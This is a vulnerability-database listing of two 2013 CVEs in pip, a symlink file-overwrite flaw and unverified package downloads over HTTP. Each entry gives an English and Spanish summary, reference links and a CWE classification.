CVE-2013-1888
https://notcve.org/view.php?id=CVE-2013-1888
pip before 1.3 allows local users to overwrite arbitrary files via a symlink attack on a file in the /tmp/pip-build temporary directory. pip anterior a v1.3 permite a los usuarios locales sobrescribir archivos arbitrarios a través de un ataque de enlace simbólico de un archivo en el directorio temporal /tmp/pip-build. • http://lists.fedoraproject.org/pipermail/package-announce/2013-May/105952.html http://lists.fedoraproject.org/pipermail/package-announce/2013-May/105989.html http://lists.fedoraproject.org/pipermail/package-announce/2013-May/106311.html http://www.openwall.com/lists/oss-security/2013/03/22/10 https://github.com/pypa/pip/issues/725 https://github.com/pypa/pip/pull/734/files https://github.com/pypa/pip/pull/780/files • CWE-59: Improper Link Resolution Before File Access ('Link Following') •
CVE-2013-1629
https://notcve.org/view.php?id=CVE-2013-1629
pip before 1.3 uses HTTP to retrieve packages from the PyPI repository, and does not perform integrity checks on package contents, which allows man-in-the-middle attackers to execute arbitrary code via a crafted response to a "pip install" operation. “pip” anterior a v1.3 utiliza HTTP para recuperar paquetes del repositorio PyPI, y no realiza comprobaciones de integridad en el contenido del paquete, que permite a atacantes man-in-the-middle ejecutar código arbitrario a través de una respuesta diseñada a una operación de "pip install". • http://www.pip-installer.org/en/latest/installing.html http://www.pip-installer.org/en/latest/news.html#changelog http://www.reddit.com/r/Python/comments/17rfh7/warning_dont_use_pip_in_an_untrusted_network_a https://bugzilla.redhat.com/show_bug.cgi?id=968059 https://github.com/pypa/pip/issues/425 https://github.com/pypa/pip/pull/791/files • CWE-20: Improper Input Validation •